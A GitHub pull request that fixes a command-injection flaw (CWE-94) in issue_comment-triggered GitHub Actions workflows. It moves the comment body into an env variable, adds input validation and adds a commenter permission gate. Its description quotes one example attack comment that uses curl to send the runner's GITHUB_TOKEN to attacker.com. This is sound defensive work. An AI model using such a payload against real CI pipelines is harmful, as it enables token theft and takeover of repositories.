### PR TITLE
fix: harden issue_comment workflows against command injection (CWE-94)

### DIFF
--- a/.github/workflows/aggregate-batch.yaml
+++ b/.github/workflows/aggregate-batch.yaml
@@ -57,15 +57,36 @@ jobs:
         with:
           python-version: '3.12'
 
+      - name: Verify commenter permission
+        if: github.event_name == 'issue_comment'
+        uses: actions/github-script@v7
+        with:
+          script: |
+            const commenter = context.payload.comment.user.login;
+            const { data: perm } = await github.rest.repos.getCollaboratorPermissionLevel({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              username: commenter,
+            });
+            if (perm.permission !== 'admin' && perm.permission !== 'write') {
+              core.setFailed(`User ${commenter} does not have write access`);
+            }
+
       - name: Parse trigger inputs
         id: inputs
         env:
           GH_TOKEN: ${{ github.token }}
+          COMMENT_BODY: ${{ github.event.comment.body }}
         run: |
           if [ "${{ github.event_name }}" = "issue_comment" ]; then
             # Parse from comment: /aggregate 61,62,63,64,65
-            COMMENT="${{ github.event.comment.body }}"
-            CHILD_ISSUES=$(echo "$COMMENT" | sed 's|/aggregate[[:space:]]*||' | tr -d '[:space:]')
+            # COMMENT_BODY is passed via env to avoid script injection (CWE-94)
+            CHILD_ISSUES=$(echo "$COMMENT_BODY" | sed 's|/aggregate[[:space:]]*||' | tr -d '[:space:]')
+            # Validate that CHILD_ISSUES contains only digits and commas
+            if ! echo "$CHILD_ISSUES" | grep -qE '^[0-9]+(,[0-9]+)*$'; then
+              echo "ERROR: Invalid child issues format. Expected comma-separated numbers."
+              exit 1
+            fi
             BATCH_ISSUE=${{ github.event.issue.number }}
             echo "Triggered via issue comment on #${BATCH_ISSUE}"
           else

--- a/.github/workflows/create-batch-children.yaml
+++ b/.github/workflows/create-batch-children.yaml
@@ -38,6 +38,21 @@ jobs:
        && contains(github.event.issue.labels.*.name, 'batch-test')
        && startsWith(github.event.comment.body, '/batch-start'))
     steps:
+      - name: Verify commenter permission
+        if: github.event_name == 'issue_comment'
+        uses: actions/github-script@v7
+        with:
+          script: |
+            const commenter = context.payload.comment.user.login;
+            const { data: perm } = await github.rest.repos.getCollaboratorPermissionLevel({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              username: commenter,
+            });
+            if (perm.permission !== 'admin' && perm.permission !== 'write') {
+              core.setFailed(`User ${commenter} does not have write access`);
+            }
+
       - uses: actions/checkout@v4
 
       - name: Parse batch issue and create children


### PR DESCRIPTION
## Summary

Fixes a script injection vulnerability in `aggregate-batch.yaml` and adds defense-in-depth permission gating to both `issue_comment`-triggered workflows.

## Vulnerability

In `aggregate-batch.yaml`, the comment body was interpolated directly into a bash variable using GitHub Actions expression syntax:

```yaml
# BEFORE (vulnerable)
run: |
  COMMENT="${{ github.event.comment.body }}"
```

GitHub Actions expands `${{ }}` expressions *before* the shell runs. A malicious comment like `/aggregate $(curl attacker.com/exfil?t=$(cat $GITHUB_TOKEN))` would execute arbitrary commands on the runner. This is CWE-94 / CWE-78 (command injection via untrusted input in a shell context).

## Fixes Applied

### 1. Eliminate the injection vector (`aggregate-batch.yaml`)

The comment body is now passed through an **environment variable** instead of inline expansion:

```yaml
# AFTER (safe)
env:
  COMMENT_BODY: ${{ github.event.comment.body }}
run: |
  CHILD_ISSUES=$(echo "$COMMENT_BODY" | sed 's|/aggregate[[:space:]]*||' | tr -d '[:space:]')
```

When passed via `env:`, the value is set as a regular environment variable — bash does **not** perform command substitution on the RHS of an assignment read from the environment. This completely eliminates the injection vector.

### 2. Input validation (`aggregate-batch.yaml`)

After extracting the value, we validate it matches the expected format (comma-separated integers only):

```bash
if ! echo "$CHILD_ISSUES" | grep -qE '^[0-9]+(,[0-9]+)*$'; then
  echo "ERROR: Invalid child issues format."
  exit 1
fi
```

This ensures even if a bypass were found, only numeric issue references are accepted.

### 3. Permission gating (both workflows)

Both `aggregate-batch.yaml` and `create-batch-children.yaml` now verify the commenter has **write or admin** access before any shell code executes:

```yaml
- name: Verify commenter permission
  uses: actions/github-script@v7
  with:
    script: |
      const { data: perm } = await github.rest.repos.getCollaboratorPermissionLevel({...});
      if (perm.permission !== 'admin' && perm.permission !== 'write') {
        core.setFailed(`User ${commenter} does not have write access`);
      }
```

This runs *before* checkout or any shell steps, so unauthorized users are rejected immediately regardless of what they put in the comment.

## Why the existing `if:` gate was insufficient

The workflow's `if:` condition checked for the `batch-test` label and a `/aggregate` prefix, but:
- Any GitHub user can comment on public issues
- Labels are set by maintainers, but issues can remain open with labels indefinitely
- The `if:` gate does NOT verify *who* posted the comment

## What's NOT affected

- `auto-trigger-tests.yaml` — uses `pull_request_target`, not `issue_comment`. No comment body interpolation.
- `create-batch-children.yaml` — did not interpolate comment body into shell (used only `${{ github.event.issue.number }}`), but now has the permission gate for defense-in-depth.
- `restrict-test-issues.yaml` — already had a collaborator permission check.

## Testing

These changes are backward-compatible. Authorized users posting `/aggregate` and `/batch-start` comments work exactly as before. Unauthorized users now get a clear failure message.


## Type of Change

<!-- Check the relevant option(s) -->

- [ ] 📝 New rule - Adding a new best practice rule
- [ ] ✏️ Rule improvement - Updating an existing rule
- [ ] 🆕 New skill - Adding an entirely new skill
- [ ] 🐛 Bug fix - Fixing an issue with existing content
- [ ] 📚 Documentation - Updating README, CONTRIBUTING, or other docs
- [x] 🔧 Build/Scripts - Changes to build process or scripts

## Checklist

<!-- Ensure you've completed these steps -->

- [ ] I have read the [Contributing Guide](https://github.com/AzureCosmosDB/cosmosdb-agent-kit/blob/main/CONTRIBUTING.md)
- [ ] I ran `npm run validate` and it passed
- [ ] I ran `npm run build` to regenerate AGENTS.md (if adding/updating rules)
- [ ] My rule file follows the naming convention: `{prefix}-{description}.md`
- [ ] My rule includes valid frontmatter (`title`, `impact`, `tags`)

## For New Rules

<!-- Fill this out if adding a new rule, otherwise delete this section -->

**Rule file:** `skills/cosmosdb-best-practices/rules/_____.md`

**Category:** <!-- e.g., Query Optimization, Data Modeling, SDK Best Practices -->

**Impact level:** <!-- Critical / High / Medium / Low -->

**Why is this rule important?**
<!-- Explain the problem this rule addresses -->

## Testing

<!-- How did you verify this change? -->

- [ ] Tested with GitHub Copilot
- [ ] Tested with Claude Code
- [ ] Tested with Cursor
- [ ] Tested with other agent: _____
- [ ] N/A (documentation only)

## Related Issues

<!-- Link any related issues: Fixes #123, Closes #456 -->

## Additional Notes

<!-- Any other context or screenshots -->
